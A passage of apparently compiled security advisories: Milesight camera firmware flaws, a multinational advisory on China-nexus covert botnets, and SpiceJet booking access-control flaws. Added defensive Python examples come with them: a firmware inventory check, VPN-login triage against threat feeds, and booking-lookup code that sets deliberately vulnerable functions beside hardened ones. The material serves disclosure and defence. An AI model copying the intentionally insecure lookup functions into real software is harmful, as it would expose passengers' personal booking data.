fix TS2966-X12TPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4PE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS2966-X12TVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RVPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS5366-X12VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4VPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RPE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4441-X36RE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS4466-X4RWE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix TS8266-X4WE: T_61.8.0.4_LPR-r3 and prior versions: Update to T_61.8.0.4-r4 Vendor fix MS-C2964-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2972-RFLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-RFLWPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2866-X4TGPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2841-X36TPC/W: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2867-X5TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS2961-X12TPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix TS8266-FPC/P: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix 
MS-C2966-X12RLPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C2966-X12RLVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5366-X12LVPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-C5361-X12LPC: T_45.8.0.3-r9 and prior versions: Update to T_45.8.0.3-r10 Vendor fix MS-Cxx66-xxxxGOPC : 45.8.0.2-AIoT-r4 and prior versions: Update to 45.8.0.2-AIoT-r5 Vendor fix SC211: C_21.1.0.8-r4 and prior versions: Update to C_21.1.0.8-r5 Vendor fix SP111: 52.8.0.4-r5 and prior versions: Update to 52.8.0.4-r6 Vendor fix MS-Cxx66-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-RFIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx66-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Vendor fix MS-Cxx72-FIPKG1: 63.8.0.4-r1-NX and prior versions: Update to 63.8.0.5-r2-NX Mitigation Milesight asks all users to report potential security vulnerabilities to security@milesight.com. mailto:security@milesight.com Mitigation Learn more: Milesight Vulnerability Reporting Policy https://www.milesight.com/legal/vulnerability-report Relevant CWE: CWE-321 Use of Hard-coded Cryptographic Key Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-32649 A command injection vulnerability exists in the web server of specific firmware versions of Milesight cameras. 
Affected products, product status and remediations: identical to those listed for the first vulnerability above.

Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Metrics
CVSS version: 3.1
Base score: 6.8 (MEDIUM)
Vector string: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVE-2026-20766
An out-of-bounds memory access vulnerability exists in specific firmware versions of Milesight AIOT cameras.
Affected products, product status and remediations: identical to those listed for the first vulnerability above.

Relevant CWE: CWE-122 Heap-based Buffer Overflow

Metrics
CVSS version: 3.1
Base score: 8.8 (HIGH)
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Acknowledgments
Souvik Kandar reported these vulnerabilities to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage at cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper ICS-TIP-12-146-01B, Targeted Cyber Intrusion Detection and Mitigation Strategies.

Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-04-23
2026-04-23, revision 1: Initial Publication
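The practical use of the affected-version table above is an asset-inventory check: given a device's model and firmware string, decide whether the advisory's cap applies. The block below is an added example, not CISA's or Milesight's code; it assumes that a lower-case 'x' in the vendor's model and version patterns is a one-character wildcard, that the _LPR, -NX and -AIoT markers do not affect ordering, and that ADVISORY_TABLE (a hand-copied subset of the table) and SAMPLE_INVENTORY (constructed hostnames and builds) are illustrative data.

```python
"""Inventory check against the Milesight affected-version table (added example).

Labelled assumptions: a lower-case 'x' in a vendor model or version pattern is
a one-character wildcard ("MS-Cxx63-PD" covers "MS-C2963-PD", "3x.8.0.3" covers
"31.8.0.3"); markers such as "_LPR", "-NX" and "-AIoT" do not affect ordering,
only the numeric fields and the "-rN" build revision do.
"""
import re
from dataclasses import dataclass

VERSION_RE = re.compile(
    r"^(?:(?P<prefix>[A-Za-z]+)_)?(?P<nums>[0-9x]+(?:\.\d+)*)(?P<rest>.*)$"
)


@dataclass(frozen=True)
class FirmwareVersion:
    prefix: str        # family prefix such as "T", "CQ", "PO"; "" when absent
    major: str         # first field, may hold the vendor wildcard, e.g. "7x"
    fields: tuple      # remaining numeric fields, e.g. (9, 0, 19)
    revision: int      # the "-rN" build revision, 0 when absent
    tags: frozenset    # extra markers such as "LPR", "NX", "AIoT"


def parse_version(text: str) -> FirmwareVersion:
    """Split a Milesight-style firmware string into comparable parts."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version: {text!r}")
    parts = m.group("nums").split(".")
    revision, tags = 0, set()
    for tok in re.split(r"[-_]", m.group("rest")):
        rev = re.fullmatch(r"r(\d+)", tok)
        if rev:
            revision = int(rev.group(1))
        elif tok:
            tags.add(tok)
    return FirmwareVersion(m.group("prefix") or "", parts[0],
                           tuple(int(p) for p in parts[1:]),
                           revision, frozenset(tags))


def wildcard_match(pattern: str, value: str) -> bool:
    """Exact-length match where 'x' in the pattern stands for any one character."""
    return len(pattern) == len(value) and all(
        p == "x" or p == v for p, v in zip(pattern, value))


def is_affected(device_version: str, max_affected: str) -> bool:
    """True if the device is on the advisory's branch at or below the affected cap."""
    dev, cap = parse_version(device_version), parse_version(max_affected)
    if dev.prefix != cap.prefix or not wildcard_match(cap.major, dev.major):
        return False  # different firmware branch: this table row does not apply
    return (dev.fields, dev.revision) <= (cap.fields, cap.revision)


# Hand-copied subset of the advisory's table: model pattern -> (max affected, fix).
ADVISORY_TABLE = {
    "MS-Cxx63-PD": ("51.7.0.77-r12", "51.7.0.77-r13"),
    "MS-Cxx74-PA": ("3x.8.0.3-r11", "3x.8.0.3-r13"),
    "MS-Nxxxx-xxE": ("7x.9.0.19-r5", "7x.9.0.19-r6"),
    "PMC8266-FPE": ("PO_61.8.0.4_LPR", "PO_61.8.0.4-r1"),
    "TS4466-X4RIPG1": ("T_63.8.0.4_LPR-r3", "T_63.8.0.4-r4"),
    "MS-Cxx66-RFIPKG1": ("63.8.0.4-r1-NX", "63.8.0.5-r2-NX"),
}


def find_affected(inventory):
    """Return [(host, model, firmware, fix)] for every device that needs the update."""
    hits = []
    for host, model, firmware in inventory:
        for pattern, (cap, fix) in ADVISORY_TABLE.items():
            if wildcard_match(pattern, model) and is_affected(firmware, cap):
                hits.append((host, model, firmware, fix))
                break
    return hits


# Constructed sample inventory: hostnames, model numbers and builds are made up.
SAMPLE_INVENTORY = [
    ("cam-lobby-01", "MS-C2963-PD", "51.7.0.77-r12"),        # exactly at the cap
    ("cam-lobby-02", "MS-C2963-PD", "51.7.0.77-r13"),        # on the fixed build
    ("cam-yard-07", "MS-C2974-PA", "31.8.0.3-r10"),          # wildcard major, older rev
    ("nvr-core-01", "MS-N5016-UPE", "71.9.0.19-r6"),         # fixed
    ("lpr-gate-03", "PMC8266-FPE", "PO_61.8.0.4_LPR"),       # unrevisioned LPR build
    ("cam-dock-11", "TS4466-X4RIPG1", "T_63.8.0.4-r4"),      # fixed
    ("cam-nx-05", "MS-C2966-RFIPKG1", "63.8.0.5-r1-NX"),     # above cap, below fix
]

if __name__ == "__main__":
    for host, model, firmware, fix in find_affected(SAMPLE_INVENTORY):
        print(f"UPDATE NEEDED: {host} ({model}) runs {firmware}; fixed in {fix}")
```

A build that sits between the advisory's cap and its fixed version (cam-nx-05 in the sample) is not flagged, because the advisory scopes each row to the cap "and prior versions"; treat such builds as unconfirmed and check with the vendor rather than assuming they are safe.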

Defending Against China-Nexus Covert Networks of Compromised Devices

Explaining the widespread shift in tactics, techniques and procedures (TTPs) towards networks of compromised infrastructure, and how to defend against it.

Summary
With support from the UK Cyber League, this advisory has been jointly released by the National Cyber Security Centre (NCSC-UK) and international partners:
- Australian Signals Directorate's (ASD's) Australian Cyber Security Centre (ACSC)
- Communications Security Establishment Canada's (CSE's) Canadian Centre for Cyber Security (Cyber Centre)
- Germany Federal Office for the Protection of the Constitution - Bundesamt für Verfassungsschutz (BfV)
- Germany Federal Intelligence Service - Bundesnachrichtendienst (BND)
- Germany Federal Office for Information Security - Bundesamt für Sicherheit in der Informationstechnik (BSI)
- Japan National Cybersecurity Office (NCO) - 国家サイバー統括室
- Netherlands General Intelligence and Security Service - Algemene Inlichtingen- en Veiligheidsdienst (AIVD)
- Netherlands Defence Intelligence and Security Service - Militaire Inlichtingen- en Veiligheidsdienst (MIVD)
- New Zealand National Cyber Security Centre (NCSC-NZ)
- Spain National Cryptologic Centre - Centro Criptológico Nacional (CCN)
- Sweden National Cyber Security Centre - Nationellt cybersäkerhetscenter (NCSC-SE)
- United States Cybersecurity and Infrastructure Security Agency (CISA)
- United States Department of Defense Cyber Crime Center (DC3)
- United States Federal Bureau of Investigation (FBI)
- United States National Security Agency (NSA)

Its purpose is to provide network defenders with the tools needed to defend against China-nexus cyber actors and their tactic of using large-scale networks of compromised devices (covert networks) to route their cyber activity.

Introduction
Over the past few years there has been a major shift in the tactics, techniques and procedures (TTPs) used by China-nexus cyber actors, moving away from the use of individually procured infrastructure and towards the use of externally provisioned, large-scale networks of compromised devices.

The NCSC believes that the majority of China-nexus threat actors are using these networks (hereafter "covert networks"), that multiple covert networks have been created and are constantly updated, and that a single covert network may be used by multiple actors. These networks are mainly made up of compromised Small Office Home Office (SOHO) routers, as well as Internet of Things (IoT) and smart devices.

Anyone who is a target of China-nexus cyber actors may be affected by the use of covert networks. They have been used by the Chinese state-sponsored actor Volt Typhoon to pre-position offensive cyber capabilities on critical national infrastructure. The group Flax Typhoon used a different covert network of compromised infrastructure to conduct cyber espionage.

The use of covert networks of compromised devices, also known as botnets, to facilitate malicious cyber activity is not new, but China-nexus cyber actors are now using them strategically and at scale.

This advisory describes the typical makeup of a covert network and what they are being used for. It also includes protective advice for organizations being targeted by cyber activity using a covert network as an access vector.

Covert Networks
Covert networks are used to connect across the internet in a low-cost, low-risk, deniable way, disguising the origin and attribution of malicious activity. Actors have been observed using them for each phase of their cyber kill chains, from performing scans as part of reconnaissance, to the delivery of malware, communicating with that malware, and exfiltrating stolen data from a victim. They can also be used for general deniable internet browsing, allowing threat actors to research exploitation techniques, new TTPs and their victims without attribution. Some covert networks are also used by legitimate customers to browse the internet, making it challenging to attribute malicious activity.

There is evidence that covert networks used by China-nexus actors are created and maintained by Chinese information security companies. A network known to network defenders as Raptor Train, which in 2024 infected more than 200,000 devices worldwide, was controlled and managed by the Chinese company Integrity Technology Group. This company was also assessed by the FBI to be responsible for the computer intrusion activities attributed to China-based hackers known as Flax Typhoon.

"Botnet operations represent a significant threat to the UK by exploiting vulnerabilities in everyday internet-connected devices with the potential to carry out large-scale cyber attacks." - NCSC Director of Operations, Paul Chichester

Covert networks mostly consist of compromised SOHO routers, but they also pull in any vulnerable device they can exploit at scale. Raptor Train was made up of thousands of SOHO routers and IoT devices, such as web cameras and video recorders, as well as firewalls and Network Attached Storage (NAS) devices. The KV Botnet used by Volt Typhoon was mainly made up of vulnerable Cisco and NetGear routers. The edge devices were vulnerable because they were "end of life": out of date and no longer receiving updates or security patches from their manufacturers.

The cyber security industry has been aware of examples of these networks for some time and has publicly reported on the widespread scale of the threat and its implications. Mandiant Intelligence produced a public blog in May 2024 on covert networks in which they highlighted a key issue for defenders: indicator of compromise (IOC) extinction. If a particular threat group could now come from one of many covert networks, each with potentially hundreds of thousands of endpoints, and each used by multiple threat actors, old network defense paradigms of static malicious IP block lists will be less effective. This is compounded by the dynamic nature of these networks, where new nodes are added as old devices are patched or removed from use.

Typical Network Topology
The number of covert networks used by China-nexus cyber actors is large, with new networks regularly developed and deployed. The existing covert networks change too, either because of defensive or legal action, or simply as a result of software updates and new exploits being used to target different technologies for incorporation into the network. Because of this, a description of all known covert networks in detail, including how they are constructed and how they communicate, would immediately be out of date, and for most network defenders would not be practically useful.

However, most covert networks of compromised devices use the same basic set-up. Understanding this generalized structure can aid researchers and defenders by helping them to understand which part of a network they may have found, and how to defend against it.

Figure: A diagram illustrating the basic setup of a covert network.

The diagram above illustrates the basic setup of a covert network, where typically an actor will connect to the network via an on-ramp or entry node. Their traffic will be forwarded through multiple compromised devices, used as traversal nodes, before exiting the network from an exit node, usually in the same geographic region as the target.

Protective Advice
Defending against attackers using covert networks is not straightforward, and defensive tactics will differ based on the level of resources and the nature of the target organization. General advice for good cyber security practice should be followed, and some key messages can be found in the appendix of this advisory. The following advice is specifically tailored to steps which can be taken to combat the risk of attacks coming from large, dynamic networks of compromised devices. Further guidance for all organizations facing cyber security threats is available on the NCSC website.

This guidance should be considered alongside all applicable laws and regulations of the UK and co-sealing countries relating to the security of networks and data. It will be each organization's responsibility to ensure compliance with any such laws and regulations. Organizations should note that following the recommended actions set out below will not remove all risks.

All organizations
The NCSC recommends the following steps for all affected organizations to either take themselves, or ask their managed service and/or security providers to investigate for them:
- Map and understand network edge devices, developing a clear understanding of organizational assets and what should be connecting to them.
- Baseline normal connections, especially to corporate virtual private networks (VPNs) or other similar services. Would you expect connections from consumer broadband ranges?
- Leverage available dynamic threat feeds which include covert network infrastructure.
- Implement multifactor authentication for remote connections.
- Smaller organizations should consider creating and actioning a free NCSC Cyber Action Toolkit.

Larger or more at-risk organizations
Some more comprehensive measures may be appropriate if the risk to an organization is high enough, to be conducted either in-house or through a security provider:
- Apply IP address allow lists rather than deny lists for connections to corporate VPNs for remote workers.
- Use geographic allow lists or profile incoming connections based on operating system, time zones, and/or organization-specific system configuration settings.
- Implement zero trust policies for connections.
- Enforce machine certificates for Secure Sockets Layer (SSL) connections.
- Reduce the internet-facing presence of the IT estate.
- Investigate machine learning techniques to profile normal network edge activity to detect and block anomalies.

The NCSC's Cyber Essentials can help protect organizations of all sizes.

Largest or most at-risk organizations
- If Advanced Persistent Threat (APT) tracking is part of an organization's in-house capability, or if it is part of the service provided by a security vendor, consider tracking China-nexus covert networks as APTs in their own right.
- Active hunting: look for connections from IP addresses likely to be part of a covert network of compromised devices, for instance those hosting SOHO routers or IoT devices.
- Track and map covert networks reported by industry or government by looking at banners and certificates.
- Use threat reporting and threat feeds to create and implement dynamic blocklists, and create alert rules to detect incoming threats.
- Consider using NetFlow feeds to look upstream and map covert networks to find new nodes.

The NCSC Cyber Assessment Framework provides guidance for organizations under the highest levels of threat, including those operating essential services, in sectors such as energy, healthcare, transport, digital infrastructure and government.

MITRE ATT&CK®
This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

Tactic | ID | Technique | Procedure
Resource Development | T1584.005 | Compromise Infrastructure: Botnet | Botnets are used as core components of covert networks
Resource Development | T1584.008 | Compromise Infrastructure: Network Devices | Devices are compromised and added to botnets
Resource Development | T1583.003 | Acquire Infrastructure: Virtual Private Server | Virtual private servers (VPS) are used in covert networks, typically as on-ramps
Command and Control | T1090.003 | Proxy: Multi-hop Proxy | Used by China-nexus cyber actors to route traffic

Appendix: Cyber Security Best Practices
In addition to the protective advice outlined in this advisory, a number of cyber security best practices will also be useful in defending against the activity described here.
- Protect your devices and networks by keeping them up to date: use the latest supported versions, apply security updates promptly, and use antivirus and scan regularly to guard against known malware threats. See NCSC Guidance: https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software
- Prevent and detect lateral movement in your organization's networks. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement
- Implement architectural controls for network segregation. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/10-steps-network-security
- Set up a security monitoring capability so you are collecting the data that will be needed to analyze network intrusions. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes and https://www.ncsc.gov.uk/information/logging-made-easy
- Use modern systems and software. These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See NCSC Guidance: https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products
- Restrict intruders' ability to move freely around your systems and networks. Pay particular attention to potentially vulnerable entry points such as third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/preventing-lateral-movement and https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security
- Deploy a host-based intrusion detection system. A variety of products are available, free and paid-for, to suit different needs and budgets. Further information:
- Invest in preventing malware-based attacks across various scenarios. See NCSC Guidance: https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks

Disclaimer
This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks, and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by co-sealers. UK readers should refer to the NCSC website for information about NCSC assured services.

This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation. Refer any FOIA queries to ncscinfoleg@ncsc.gov.uk.

All material is UK Crown Copyright ©
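The protective advice above (baseline normal VPN connections, ask whether consumer broadband sources are expected, consume dynamic threat feeds, build alert rules) can be turned into a small triage pass over VPN authentication logs. The following is an added example written for this page, not code from the NCSC or any co-sealer: the log format, the feed and allow-list ranges, the consumer-broadband tagging and the per-user baseline hours are all constructed assumptions that a real deployment would replace with its own data sources.

```python
"""Flag corporate VPN logins that look like they arrive from a covert network
of compromised SOHO/IoT devices. Added example; all inputs are constructed.

Three checks drawn from the advisory's protective advice:
  1. dynamic blocklist: the source IP falls in a threat-feed range,
  2. expected-source profile: the source IP sits in ranges tagged as consumer
     broadband (SOHO routers) and not in the corporate/partner allow list,
  3. connection baseline: the login hour is outside the user's usual window.
"""
import ipaddress
import re
from datetime import datetime

# Constructed stand-in for a covert-network threat feed (assumption).
COVERT_NETWORK_FEED = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.64/26")]
# Constructed ranges tagged as consumer broadband / SOHO address space (assumption).
CONSUMER_BROADBAND = [ipaddress.ip_network(n) for n in ("192.0.2.0/24",)]
# Constructed corporate allow list: office egress and partner concentrators (assumption).
CORPORATE_ALLOW = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "100.64.0.0/10")]
# Constructed baseline: each user's usual login window in UTC hours, inclusive.
BASELINE_HOURS = {"alice": (7, 19), "bob": (8, 18)}

# Constructed log format (assumption): "<iso-timestamp> vpn-auth user=<u> src=<ip> result=<r>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) vpn-auth user=(?P<user>\S+) src=(?P<src>\S+) result=(?P<result>\S+)$"
)


def in_any(ip, networks):
    """True when ip belongs to at least one of the given networks."""
    return any(ip in net for net in networks)


def assess_login(line):
    """Return the list of reasons one successful login deserves attention.
    An empty list means the login matched the baseline. Failed logins and
    lines that do not parse are ignored here (they belong to other rules)."""
    m = LOG_RE.match(line)
    if not m or m.group("result") != "success":
        return []
    ip = ipaddress.ip_address(m.group("src"))
    user = m.group("user")
    hour = datetime.fromisoformat(m.group("ts")).hour
    reasons = []
    if in_any(ip, COVERT_NETWORK_FEED):
        reasons.append("source in covert-network feed")
    if in_any(ip, CONSUMER_BROADBAND) and not in_any(ip, CORPORATE_ALLOW):
        reasons.append("source in consumer broadband range outside allow list")
    lo, hi = BASELINE_HOURS.get(user, (0, 23))
    if not lo <= hour <= hi:
        reasons.append(f"login at {hour:02d}:00 UTC outside baseline {lo:02d}-{hi:02d}")
    return reasons


def triage(lines):
    """Map each alerting log line to its reasons; clean lines are omitted."""
    alerts = {}
    for line in lines:
        reasons = assess_login(line)
        if reasons:
            alerts[line] = reasons
    return alerts


# Constructed sample log lines (not real telemetry).
SAMPLE_LOG = [
    "2026-04-23T09:12:00 vpn-auth user=alice src=10.20.30.40 result=success",    # office egress
    "2026-04-23T03:05:00 vpn-auth user=alice src=198.51.100.17 result=success",  # feed hit, off hours
    "2026-04-23T10:00:00 vpn-auth user=bob src=192.0.2.77 result=success",       # SOHO range
    "2026-04-23T10:01:00 vpn-auth user=bob src=198.51.100.9 result=failure",     # failed, ignored
]

if __name__ == "__main__":
    for line, reasons in triage(SAMPLE_LOG).items():
        print(line, "->", "; ".join(reasons))
```

The feed check is the "dynamic blocklist" item and should be refreshed from the feed on a schedule, since nodes in these networks churn as devices are patched or replaced; the consumer-broadband check is a direct answer to the advisory's question about whether such sources are expected at all for a given VPN, and the baseline check is the cheapest form of the per-user profiling the larger-organization advice describes.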

SpiceJet Online Booking System

Summary
Successful exploitation of these vulnerabilities could allow an attacker to disclose sensitive information.

The following versions of SpiceJet Online Booking System are affected:
- Online Booking System vers:all/* (CVE-2026-6375, CVE-2026-6376)

CVSS v3: 7.5
Vendor: SpiceJet
Equipment: SpiceJet Online Booking System
Vulnerabilities: Authorization Bypass Through User-Controlled Key, Missing Authentication for Critical Function

Background
Critical Infrastructure Sectors: Transportation Systems
Countries/Areas Deployed: Worldwide
Company Headquarters Location: India

Vulnerabilities

CVE-2026-6375
A vulnerability in SpiceJet's booking API allows unauthenticated users to query passenger name records (PNRs) without any access controls. Because PNR identifiers follow a predictable pattern, an attacker could systematically enumerate valid records and obtain associated passenger names. This flaw stems from missing authorization checks on an endpoint intended for authenticated profile access.
Affected Products: SpiceJet Online Booking System (Vendor: SpiceJet); Product Version: vers:all/*; Product Status: known_affected
Remediations: Mitigation: SpiceJet did not respond to CISA's requests to coordinate. Users are encouraged to reach out to SpiceJet for more information: https://corporate.spicejet.com/contactus.aspx
Relevant CWE: CWE-639 Authorization Bypass Through User-Controlled Key
Metrics: CVSS v3.1: Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2026-6376
A weakness in SpiceJet's public booking retrieval page permits full passenger booking details to be accessed using only a PNR and last name, with no authentication or verification mechanisms. This results in exposure of extensive personal, travel, and booking metadata to any unauthenticated user who can obtain or guess those basic inputs. The issue arises from improper access control on a sensitive data retrieval function.
Affected Products: SpiceJet Online Booking System (Vendor: SpiceJet); Product Version: vers:all/*; Product Status: known_affected
Remediations: Mitigation: SpiceJet did not respond to CISA's requests to coordinate. Users are encouraged to reach out to SpiceJet for more information: https://corporate.spicejet.com/contactus.aspx
Relevant CWE: CWE-306 Missing Authentication for Critical Function
Metrics: CVSS v3.1: Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Acknowledgments
Owais Shaikh reported these vulnerabilities to CISA.

Legal Notice and Terms of Use
This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy).

Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities:
- Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
- Locate control system networks and remote devices behind firewalls and isolate them from business networks.
- When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.

CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

CISA also recommends users take the following measures to protect themselves from social engineering attacks:
- Do not click web links or open attachments in unsolicited email messages.
- Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.
- Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.

No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

Revision History
Initial Release Date: 2026-04-23
2026-04-23 | Revision 1 | Initial Publication
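The two weaknesses in this advisory are the classic shapes of CWE-639 (a record is selected by a caller-supplied key and the server never checks that the caller may see it) and CWE-306 (a sensitive function is gated only by values that are not secrets, here a PNR and a last name). The following is an added example written for this page, not SpiceJet's code or any reconstruction of it: the in-memory booking store, the session model, the one-time-code flow and every function name are assumptions chosen to show each gap beside one hardened form.

```python
"""Booking lookup with the two access-control gaps from the advisory
(CWE-639 and CWE-306), each beside a hardened version. Added example with
constructed data; the store, session model and function names are
assumptions, not SpiceJet's code."""
import hashlib
import hmac
import secrets
import time

# Constructed sample records keyed by PNR, the "user-controlled key" of CWE-639.
BOOKINGS = {
    "ABC123": {"owner": "alice@example.com", "last_name": "Smith", "itinerary": "DEL-BOM"},
    "ABC124": {"owner": "bob@example.com", "last_name": "Jones", "itinerary": "BLR-DEL"},
}


class Forbidden(Exception):
    """Raised when a request fails authorization or verification."""


# -- CVE-2026-6375 pattern: authenticated endpoint with no ownership check -----
def profile_booking_vulnerable(session_user, pnr):
    # session_user is never consulted, so any logged-in caller can read any PNR
    return BOOKINGS.get(pnr)


def profile_booking(session_user, pnr):
    """Hardened: release the record only to its owner. A missing PNR and
    someone else's PNR get the same answer, so the endpoint cannot be used
    to confirm which identifiers exist."""
    record = BOOKINGS.get(pnr)
    if record is None or record["owner"] != session_user:
        raise Forbidden("booking not available")
    return record


# -- CVE-2026-6376 pattern: public retrieval gated by PNR + last name only -----
def manage_booking_vulnerable(pnr, last_name):
    record = BOOKINGS.get(pnr)
    if record and record["last_name"].lower() == last_name.lower():
        return record
    return None


# Hardened: PNR + last name only begin the flow. The record is released after
# a one-time code delivered to the contact on file, with a per-PNR attempt
# budget and an expiry. Delivery is simulated by returning the code.
_CODE_KEY = secrets.token_bytes(32)   # per-process HMAC key for code hashes
_pending = {}                         # pnr -> (code_hash, expiry, attempts_left)
MAX_ATTEMPTS = 3
CODE_TTL_SECONDS = 300


def _code_hash(code):
    return hmac.new(_CODE_KEY, code.encode(), hashlib.sha256).digest()


def start_manage_booking(pnr, last_name, now=None):
    """Step 1: check the weak identifiers, then issue a one-time code."""
    now = time.time() if now is None else now
    record = BOOKINGS.get(pnr)
    if record is None or record["last_name"].lower() != last_name.lower():
        return None
    code = f"{secrets.randbelow(10 ** 6):06d}"
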